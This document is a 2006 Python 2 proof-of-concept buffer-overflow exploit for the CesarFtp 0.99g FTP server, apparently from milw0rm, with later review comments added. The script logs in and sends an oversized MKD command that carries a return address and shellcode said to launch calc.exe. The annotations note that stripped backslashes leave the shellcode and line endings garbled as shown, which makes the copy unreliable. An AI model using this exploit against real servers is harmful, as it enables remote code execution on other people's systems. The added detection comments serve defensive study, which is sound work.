- #!/usr/bin/python
- #CesarFtp 0.99g 0day Exploit
- #Proof of Concept: execute calc.exe
- #Tested on XP sp2 polish
- #Bug found by h07 [h07@interia.pl]
- #Date: 10.06.2006
- from socket import *
- # Opaque payload blob. The author's inline comment attributes it to
- # metasploit.com and says it launches calc.exe as a visible proof of code
- # execution; nothing in this listing decodes or verifies that.
- # NOTE(review): the literals read "x31xc9..." with no backslashes, so the
- # "\x" escapes appear to have been stripped when the paste was rendered. As
- # shown these are ASCII text, not the author's bytes - do not derive
- # signatures or hashes from this copy; confirm against the original posting.
- shellcode = ( #execute calc.exe <metasploit.com>
- "x31xc9x83xe9xdbxd9xeexd9x74x24xf4x5bx81x73x13xd8"
- "x22x72xe4x83xebxfcxe2xf4x24xcax34xe4xd8x22xf9xa1"
- "xe4xa9x0exe1xa0x23x9dx6fx97x3axf9xbbxf8x23x99x07"
- "xf6x6bxf9xd0x53x23x9cxd5x18xbbxdex60x18x56x75x25"
- "x12x2fx73x26x33xd6x49xb0xfcx26x07x07x53x7dx56xe5"
- "x33x44xf9xe8x93xa9x2dxf8xd9xc9xf9xf8x53x23x99x6d"
- "x84x06x76x27xe9xe2x16x6fx98x12xf7x24xa0x2dxf9xa4"
- "xd4xa9x02xf8x75xa9x1axecx31x29x72xe4xd8xa9x32xd0"
- "xddx5ex72xe4xd8xa9x1axd8x87x13x84x84x8exc9x7fx8c"
- "x28xa8x76xbbxb0xbax8cx6exd6x75x8dx03x30xccx8dx1b"
- "x27x41x13x88xbbx0cx17x9cxbdx22x72xe4")
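def intel_order(i):
    """Return the low 32 bits of *i* as four characters, least-significant first.

    This is little-endian ("Intel") byte order: 0x773D10A4 becomes the
    characters 0xA4, 0x10, 0x3D, 0x77. Bits above the low 32 are ignored.

    The listing's version had lost its indentation and bound the result to a
    local named ``str``, shadowing the builtin; both are corrected here and
    the result is unchanged.

    On Python 2 (which this script targets, given its ``print`` statements)
    the result is a byte string. On Python 3 it is a text ``str`` and would
    have to be encoded before being written to a socket.
    """
    # Take one byte per 8-bit shift, lowest byte first.
    return "".join(chr((i >> shift) & 0xFF) for shift in (0, 8, 16, 24))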
- # Connection settings are hard-coded: a private-range address, the standard
- # FTP control port, and an "ftp"/"ftp" login. The MKD request below is sent
- # only after the USER/PASS exchange, so as written it needs a valid login.
- host = "192.168.0.1"
- port = 21
- user = "ftp"
- password = "ftp"
- # Hard-coded 32-bit value placed in the request after the filler; the
- # variable name and inline comment describe it as a return address.
- # NOTE(review): the inline comment names an English XP SP2 shell32.dll,
- # while the file header says the script was tested on Polish XP SP2. The
- # value is tied to one DLL build, so the two statements should be reconciled.
- EIP = 0x773D10A4 #jmp esp <shell32.dll XP professional sp2 english>
- # Plain TCP socket with no timeout set; each recv() blocks until data arrives.
- # Server replies are printed but never checked, so a failed login is not
- # detected before the oversized request is sent.
- # The print statements are Python 2 syntax.
- s = socket(AF_INET, SOCK_STREAM)
- s.connect((host, port))
- print s.recv(1024)
- s.send("user %srn" % (user))
- print s.recv(1024)
- s.send("pass %srn" % (password))
- print s.recv(1024)
- # One FTP MKD command whose argument is 671 filler characters, 3 padding
- # characters, the 4-byte value from intel_order(), 40 more characters, and
- # the payload blob - far longer than any legitimate directory name.
- # For defenders: an MKD argument of this length on the control channel is a
- # usable detection signal, and bounding path length server-side is the fix
- # class. NOTE(review): the vulnerable server code is not shown on this page.
- # NOTE(review): "n", "x90" and "rn" look like "\n", "\x90" and "\r\n" with
- # the backslashes stripped by the paste; as shown they are literal letters.
- buffer = "MKD "
- buffer += "n" * 671
- buffer += "A" * 3 + intel_order(EIP)
- buffer += "x90" * 40 + shellcode
- buffer += "rn"
- print "len: %d" % (len(buffer))
- s.send(buffer)
- print s.recv(1024)
- s.close()
- #EoF
- # milw0rm.com [2006-06-12]